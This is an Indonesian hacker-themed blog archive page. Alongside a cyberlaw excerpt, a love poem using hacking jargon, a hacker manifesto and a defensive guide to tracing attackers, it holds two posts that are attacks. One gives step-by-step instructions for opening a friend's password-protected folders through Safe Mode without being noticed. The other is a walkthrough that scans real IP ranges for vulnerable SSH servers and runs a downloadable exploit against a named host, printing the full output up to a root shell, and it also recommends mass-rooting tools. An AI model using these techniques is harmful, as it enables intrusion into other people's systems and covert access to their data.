Tampilkan postingan dengan label Hacker. Tampilkan semua postingan
Tampilkan postingan dengan label Hacker. Tampilkan semua postingan

Rabu, 29 Oktober 2008

Cyberlaw: Hukum dan Keamanan

Cyberlaw: Hukum dan Keamanan

A man has a right to pass through this world, if he wills,without having his picture published, his business enterprise discussed,his successful experiments written up for the benefit of others,or his eccentricities commented upon,whether in handbills, circulars, catalogues, newspapers or periodicals.-- Chief Justice Alton B. Parker (New York Court of Appeals),decision in Roberson v. Rochater Folding Box Co., 1901The larger point to remember is that laws must be written in relation to actions, nottechnology.

-- Tim Berners-Lee, inventor of WWW in "Weaving the Web"

Masalah keamanan erat hubungannya dengan masalah hukum. Terminologi cyberlaw mulai banyak terdengar. Internet menghilangkan batas tempat dan waktu, dua asas yang cukup esensial di bidang hukum. Dimanakah batas teritori dari cyberlaw? Untuk siapakah cyberlaw dibuat? Biasanya hukum menyangkut citizen dari yuridiksi hukum tersebut. Cyberlaw biasanya terkait dengan Netizen. Untuk Indonesia, siapakah netizen Indonesia?

Terhubungnya sebuah sistem informasi dengan Internet membuka peluang adanya kejahatan melalui jaringan komputer. Hal ini menimbulkan tantangan bagi penegak hukum. Hukum dari sebagian besar negara di dunia belum menjangkau daerah cyberspace. Saat ini hampir semua negara di dunia berlomba-lomba untuk menyiapkan landasan hukum bagi Internet. Tentunya banyak hal yang dapat dibahas, masalah lain seperti pajak (hal-hal yang berhubungan dengan perbankan dan bisnis), trademark, HaKI (Intellectual Property Rights atau IPR), dan yang tidak langsung terkait dengan masalah keamanan tidak dibahas di dalam buku ini.

Dalam aplikasi e-commerce, misalnya, ada masalah yang berkaitan dengan hukum yaitu masalah privacy dan penggunaan teknologi kriptografi (seperti penggunaan enkripsi). Setiap negara memiliki hukum yang berlainan. Misalnya negara Amerika Serikat melarang ekspor teknologi enkripsi. Demikian pula pengamanan data-data yang berhubungan dengan bidang kesehatan sangat diperhatikan. Selain itu sistem perbankan setiap Negara memiliki hukum yang berlainan. Hal-hal inilah yang menyulitkan commerce yang melewati batas fisik negara.

Penegakan hukum (law enforcement) merupakan masalah tersendiri. Ambil contoh seseorang yang tertangkap basah melakukan cracking yang mengakibatkan kerugian finansial. Hukuman apa yang dapat diberikan? Sebagai contoh, di Cina terjadi hukuman mati atas dua orang crackers yang tertangkap mencuri uang sebesar US$31.400 dari sebuah bank di Cina bagian Timur. Berita lengkapnya dapat dibaca di:

http://www.news.com/News/Item/0,4,30332,00.html

http://cnn.com/WORLD/asiapcf/9812/28/BC-CHINA-HACKERS.reut/

index.html

http://slashdot.org/articles/98/12/28/096231.shtml

Bagaimana dengan di Indonesia?

Di kutip dari buku Keamanan Sistem Informasi Berbasis Internet - Budi Rahardjo

Minggu, 26 Oktober 2008

Surat Cinta Seorang Hacker

Seandainya hatimu adalah sebuah system,
maka aku akan scan kamu untuk mengetahui port mana yang terbuka Sehingga tidak ada keraguan saat aku c:\> nc -l -o -v -e ke hatimu,
tapi aku hanya berani ping di belakang anonymouse proxy,
inikah rasanya jatuh cinta
sehingga membuatku seperti pecundang atau aku memang pecundang sejati whatever!

Seandainya hatimu adalah sebuah system,
ingin rasanya aku manfaatkan vulnerabilitiesmu,
pake PHP injection Terus aku ls -la; find / -perm 777 -type d,
sehingga aku tau kalo di hatimu ada folder yang bisa ditulisi atau adakah free space buat aku?.
apa aku harus pasang backdor "Remote Connect-Back Shell"
jadi aku tinggal nunggu koneksi dari kamu saja, biar aku tidak merana seperti ini.

Seandainya hatimu adalah sebuah system,
saat semua request-ku diterima aku akan nogkrong terus di bugtraq
untuk mengetahui bug terbarumu maka aku akan patch n pacth terus,
aku akan jaga service-mu jangan sampai crash n aku akan menjadi firewallmu aku akan pasang portsentry,
dan menyeting error pagemu " The page cannot be found Coz Has Been Owned by Someone get out!"
aku janji gak bakalan ada macelinious program
atau service yang hidden,
karena aku sangat sayang dan mencintaimu.

Seandainya hatimu adalah sebuah system,
jangan ada kata "You dont have permission to access it" untuk aku,
kalau ga mau di ping flood Atau DDos Attack jangan ah....! kamu harus menjadi sang bidadari penyelamatku.

Seandainya hatimu adalah sebuah system, ...?

Tapi sayang hatimu bukanlah sebuah system,
kamu adalah sang bidadari impianku, yang telah mengacaukan systemku!
Suatu saat nanti aku akan datang n mengatakan kalau di hatiku sudah terinfeksi virus yang Menghanyutkan,
Ga ada anti virus yang dapat menangkalnya selain ...kamu.

Senin, 12 November 2007

MANIFESTO

Ini adalah dunia kami sekarang... dunia elektron dan sambungan, keindahan sang 'baut'. Kami menggunakan layanan yang sudah tersedia tanpa membayar harga yang seharusnya betul-betul murah jika saja layanan tersebut tidak dijalankan oleh orang-orang yang mencari untung, dan kalian menyebut kami penjahat. Kami menjelajah... dan kalian menyebut kami penjahat. Kami mengejar pengetahuan... dan kalian menyebut kami penjahat. Kami ada tanpa perbedaan warna kulit, tanpa perbedaan kebangsaan, tanpa perbedaan agama, tanpa perbedaan umur, tanpa prasangka keagamaan ... dan kalian sebut kami penjahat.

Kalian membuat bom, kalian berperang, kalian membunuh, mencurang,korupsi, menjual manusia dan berbohong kepada kami sambil berusaha meyakinkan kami bahwa ini adalah untuk kebaikan semua, namun kalian menilai kamilah yang jahat.

Ya, saya adalah seorang kriminal.
Ya, saya adalah seorang Penjahat.
Ya, saya adalah seorang bandit.

saya masih mempunyai hati nurani.
Hati nurani saya sudah tertutup oleh padangan kalian terhadap saya.
Saya melakunankan kejahatan hanya sekedar haus ilmu.
Ilmu yang mahal yang membuat saya seperti ini.

Ingat jangan menilai kami dari keburukan, tapi nilai lah apa yang kami lakukan
Ingat semua penjahat, belum tentu jahat.
Ingat kami merusak, hanya mencari ilmu yang tidak pernah kami dapatkan di pendidikan.
Pendidikan yang mahal yang membuat saya seperti ini.

Oleh karena itu, hargailah semua karya kami.
oleh karena itu, jangan melihat kami hanya sebelah mata.

Coba kalian pikirkan siapa yang jahat ?
Kalian Buat Bom untuk membunuh orang ?......
kami buat virus cuman mengetahui sebuah ilmu ?......
Kalian korupsi, hanya untuk kekayaan yang tidak ada artinya ?......
kami tidak pernah mengenal kata korupsi ?......
Kalian adu Jotos hanya untuk sesuatu kekuasaan ?......
Kami adu kepintaran hanya untuk sesuatu kekuasaan ?......

"Kejahatanku adalah rasa keingintahuanku. Kejahatanku adalah menilai seseorang dari perkataan dan perbuatannya, bukan dari penampilannya. Kejahatanku adalah menjadi lebih pintar dari kalian, sesuatu yang tak akan kalian maafkan."

saya adalah seorang Hacker, dan ini adalah manifestoku. Kalian bisa saja menghentikanku, namun kalian tak mungkin menghentikan kami semua ....

Kamis, 09 Agustus 2007

Cara Mengidentifikasi Serangan Hacker

Saya yakin temen temen udah pada tau tentang hal ini, tapi ini cuma sekedar mengingatkan kembali memori kita dulu menangani security dengan cara manual, jangan menyalah gunakan artikel ini dan saya tidak bertanggung jawab atas penyalah gunaan artikel ini

Sumber : www dot Hackersbook dot com


Semoga bermanfaat

Identifying attackers – “Pants down"
You certainly experience people trying to send you Trojans or viruses or attacking you with unnecessary mails. Your firewall will caution you in
such cases and reveal the sender’s IP address in the mail header.
The IP address comes in handy when trying to identify the origin of the
attack. We want to illustrate what steps to take in order to get as much
information as possible.

PING
The IP address gives the attacker’s Internet address. The numerical
address like 212.214.172.81 does not reveal much. You can use PING to convert the address into a domain name in WINDOWS: The Domain
Name Service (DNS) protocol reveals the matching domain name. PING
stands for “Packet Internet Groper” and is delivered with practically every Internet compatible system, including all current Windows versions.
Make sure you are logged on to the net. Open the DOS shell and enter
the following PING command:
Ping –a 123.123.12.1
Ping will search the domain name and reveal it. You will often have
information on the provider the attacker uses e.g.:
dialup21982.gateway123.provider.com

This means that the attacker logged on using “provider.com”.
Unfortunately, there are several IP addresses that cannot be converted
into domain names. The following passage may be of help in such
cases.

Traceroute – Where is the attack from?
Traceroute is also carried out in the MS DOS shell, and connects your
PC to another one that is in the Internet or to a server. In precise terms, Traceroute traces the route of data packages that have reached you from a particular location in the net and vice versa. Internet comprises of several servers and routers that function as stations that convey your data packages further.
Traceroute is known as “tracert” in Windows.
Tracert 123.123.12.1
Tracer connects to the computer whose IP has been entered and reveals all stations starting from your Internet connection. Both the IP address as well as the domain name (if available) is displayed.
If PING cannot reveal a name, Traceroute will possibly deliver the name of the last or second last station to the attacker, which may enable conclusions concerning the name of the provider used by the attacker and the region from which the attacks are coming.
After identifying a provider in this manner (e.g. provider.com), you can
obtain more information on this provider at http://www.netsol.com/cgibin/whois/whois .
Foreign domain names can searched for under the WHOIS section of
that country. You will find these at http://ww.nic. +national top-leveldomains.
e.g. http://www.nic.at for Austria or http://www.nic.ch for
Switzerland or http://www.nic.de for Germany.

Geographical analysis with NeoTrace
Finally, we would like to introduce another tool, “NeoTrace”, which even
gives a graphical display of TRACEROUTE analysis and the connection
on a map. A free trial version is available at http://www.neotrace.com.
After downloading, you should install while still online to enable Neotrace
display the geographical details.
Enter your country and the next city to where you are.
After installing, you can enter the IP address you are targeting in the
area marked “Target”, then click “Go”.

terims Kepada dokter_cinta

By ^Xmoensen^

Menjebol Password PC Security tanpa ketahuan

ini adalah pengalam saya di tempat kos teman, sewaktu teman saya itu pulang kampung dan komputernya di tinggalkan di teman kosnya.
sewaktu saya mau mencopy file di komputer tersebut, ehh ngak taunya folder tersebut di protek sama PC Security, padahal data tersebut sangat penting sekalai.
di tanya sama teman ngak tau passwordnya, kalau di sms menghabiskan pulsa aja nih.pertama saya coba unistall kan PC Securitynya ehh
ngak mau nih. Kalau di hapus file passwornya ntar dia marah kalau PC Securitynya di bobol sama temana sendiri.
Setelah berpikir gimana caranya bobol PC Security tanpa mengubah password awalnya.??? ehh jadi teringat sama mengapus virus lewat Safe Mode,
kalau di safe mode kan program selain windowskan ngak jalan, tapi apa berhasil ya mari kita coba aja.
restart Komputer tersebut --> booting tekan F8 ( saya lupa nih F8 atau F5 ya, coba aja sendiri ) -->> terus masuk ke safe mode
setelah anda masuk safe mode, coba aja clik folder yang terproteksi sama PC Security itu, ehh ternya berhasil dan ngak ada proteksi sama sekali sama PC Securitynya.
ingat sewaktu di dalam safe mode tu copy dulu data nya ke luar folder yang ngak ada proteksinya sama PC Security. Trus Restart aja komp nya dan masuk sebagai normal aja
dan coba aja vlik folder yang terproteksi tadi pas terkuncikan.
Jadi anda tidak ketahuan kalau passwordnya PC Security teman anda di bobol.
Sekian Dulu ya petunjuk dari saya, Oya kalau ada ilmu baru bagi2 ke XmoenseN@gmail.com

ucapan minta maaf kepada teman saya zondara karen Komputer nya udah saya bobol , sekali saya minta maaf :D
terima kasih teman1 di kampus yang udah memberikan semangat dan telah menolong saya dalam pengisian Absen ( saya agak malas sish ke kampus )
teman teman yang ada di Chanel #awali di DAlnet semoga kita semua makin akrab dan Cita2 kita semua tercapai.
Dan tak lupa ke pada senior saya Aw4nk, Bang Ray, GAtotyang telah membantu saya
dan teman saya Yuli semoga betah kerja di Conter ya dan fitri, rina, ane rine bekerja lah dengan baik.
dan kepada hacker, programer minang mari kita jaga nama baik Ranah Minang nan Elok Ko.

By ^XmoenseN^

Selasa, 07 Agustus 2007

Rootsshattck

Rooting dengan X2, X3, X4 SSHdeattack
Mendapatkan root dari linux mempunyai beberapa metode, dan salah satunya adalah menyerang ssh, yaitu shell dengan open 22. Tools yang akan dijelaskan berikut ini adalah menggunakan X2, X3 dan X4.



lebih lanjut...
1. download scanning http://xvak-1.150m.com/tool/grabbb-0.1.0.tar.gz
2. tar -zxvf grabbb-0.1.0.tar.gz dan make , maka akan kmu dapati file grabbb.
3. cara penggunaan grabbb :
a. ketik ./grabbb maka akan ada help nya
b. klo saya biasanya ./grabbb -a xxx.xxx.xxx.0 -b xxx.xxx.xxx.255 port <== port disini
terserah kmu mau berapa, bisa 21, 22, 23, 443, 80, 8080
- klo kita scan port 21 maka akan keliatan versi wuftpd
- klo kita scan port 22 maka akan keliatan versi ssh
- klo kita scan port 443 maka akan keliatan versi openssl

berikut contoh ssh:
66.1.198.210:22: SSH-1.99-OpenSSH_2.5.2p2
66.1.205.138:22: SSH-1.99-OpenSSH_2.9p2
66.1.213.59:22: SSH-1.5-1.2.27
66.1.214.123:22: SSH-1.99-OpenSSH_2.9p2
66.1.217.77:22: SSH-1.5-1.2.25

setelah kita tau ssh yang dipake, tinggal menjalankan exploitnya

4. download x2, x3, x4 dst tergantung kmu mau pake yang mana, pake semua juga bisa
sebagai contoh pemakaian saya pake x3.tar.gz
5. ./x3 -t 0
SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)
Targets:
( 1) Small - SSH-1.5-1.2.26
( 2) Small - SSH-1.5-OpenSSH-1.2.3
( 3) Small - SSH-1.5-1.2.31
( 4) Small - SSH-1.5-1.3.07
( 5) Small - SSH-1.99-OpenSSH_2.1.1
( 6) Small - SSH-1.5-1.3.6_F-SECURE_SSH
( 7) Small - SSH-1.5-1.2.27
( Kalem Small - SSH-1.99-OpenSSH_2.2.0p1
( 9) Big - SSH-1.99-OpenSSH_2.2.0p1
(10) Big - SSH-1.5-1.2.27
(11) Small - SSH-1.99-OpenSSH_2.2.0p1 -TEST
(12) Big - SSH-1.5-1.2.27

6. klo kita liat hasil dari grabbb, maka kita mendapat satu ip yaitu
66.1.213.59:22: SSH-1.5-1.2.27

7. kita coba ./x3 -t 7 66.1.213.59 22 .
SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)

Target: Small - SSH-1.99-OpenSSH_2.2.0p1

Attacking: 66.1.213.59:22
Testing if remote sshd is vulnerable # ATTACH NOW

YES #
Finding h - buf distance (estimate)
(1 ) testing 0x00000004 # SEGV #
(2 ) testing 0x0000c804 # FOUND #
Found buffer, determining exact diff
Finding h - buf distance using the teso method
(3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SEGV #
(4 ) binary-search: h: 0x083f77fc, slider: 0x00004000 # SURVIVED
(5 ) binary-search: h: 0x083f97fc, slider: 0x00002000 # SURVIVED #
(6 ) binary-search: h: 0x083fa7fc, slider: 0x00001000 # SURVIVED #
(7 ) binary-search: h: 0x083faffc, slider: 0x00000800 # SEGV #
(8 ) binary-search: h: 0x083fabfc, slider: 0x00000400 # SURVIVED #
(9 ) binary-search: h: 0x083fadfc, slider: 0x00000200 # SEGV #
(10) binary-search: h: 0x083facfc, slider: 0x00000100 # SEGV #
(11) binary-search: h: 0x083fac7c, slider: 0x00000080 # SURVIVED #
(12) binary-search: h: 0x083facbc, slider: 0x00000040 # SURVIVED #
(13) binary-search: h: 0x083facdc, slider: 0x00000020 # SURVIVED #
Bin search done, testing result
Finding exact h - buf distance
(16) trying: 0x083facdc # SURVIVED #
Exact match found at: 0x00005324
Looking for exact buffer address
Finding exact buffer address
(17) Trying: 0x080c5324 # SEGV #
(18) Trying: 0x080c6324 # SEGV #
(19) Trying: 0x080c7324 # SEGV #
(20) Trying: 0x080c8324 # SEGV #
(21) Trying: 0x0810e324 # SURVIVED #
(22 Trying: 0x08088634 # OK #
Finding distance till stack buffer

Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807


********* YOU ARE IN *********

uname -a ; id
uname -a ; id
Linux chander.com.tw 2.4.18-3 #1 Thu Apr 18 07:31:07 EDT 2002 i586 unknown
uid=48(root) gid=48(root) groups=48(root)

nah itu uah dapat, terserah mau diapakan

keterangan:
ngeroot menggunakan exploit ini sangatlah memakan waktu, saya menyarankan utk memakai scan massal, bisa memakai massplo.tar.gz atau massrooter.tar.gz sama saja.

tapi yang terpenting disini kita tau bagaimana cara mencari dia memakai ssh versi berapa, wuftp versi berapa, dan yang lain-lain.

ok, sekian dulu dari saya. terima kasih untuk teman-teman yang telah membantu selama ini.

Pusing ya. saya juga pusing

Senin, 06 Agustus 2007

Apakah Kamu Hacker ?

Buatlah sebuah pertanyaan kecil untukku hari ini. Katakan jika kamu

cocok dengan deskripsi di bawah ini. kamu mendapatkan net account beberapa

bulan yang lalu. kamu sudah surfing di internet, dan kamu bercanda di banyak

media yang melaporkan informasi superhighway. kamu telah mempunyai red

box, kamu tidak perlu membayar untuk menelepon. Kamu mempunyai

crackerjack, dan kamu telah menjalankannya di file password pada sebuah unix

dan kamu mendapatkan sebuah account. Semua orang di sekolahmu salut

dengan pengetahuanmu tentang komputer, kamu adalah satu-satunya orang

yang diminta gurumu untuk membantunya. Apakah kamu seperti itu? kamu

bukanlah seorang hacker.

Ada ratusan orang sepertimu di luar sana. Kamu membeli 2600 dan kamu

bertanya. kamu membaca phreack dan kamu bertanya. kamu bergabung dengan

#hack dan kamu bertanya. kamu menanyakan semua pertanyaan, dan bertanya

apa yang salah dengan itu? Intinya, untuk menjadi hacker adalah bertanya

tentang sesuatu, benar begitu? Semua yang kamu ingin tahu adalah jawaban dari

pertanyaanmu. Kamu bukanlah hacker.

Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang

kamu ambil untuk mencari jawaban. jika kamu membutuhkan bantuan, jangan

bertanya untuk mendapatkan jawaban, bertanyalah tentang jalan yang harus

kamu ambil untuk mencari jawaban untuk dirimu sendiri. Karena bukanlah

seseorang yang memiliki jawaban yang disebut hacker, tetapi orang yang

melakukan perjalan sepanjang jalan.


Dikuti dari ^rumput_kering^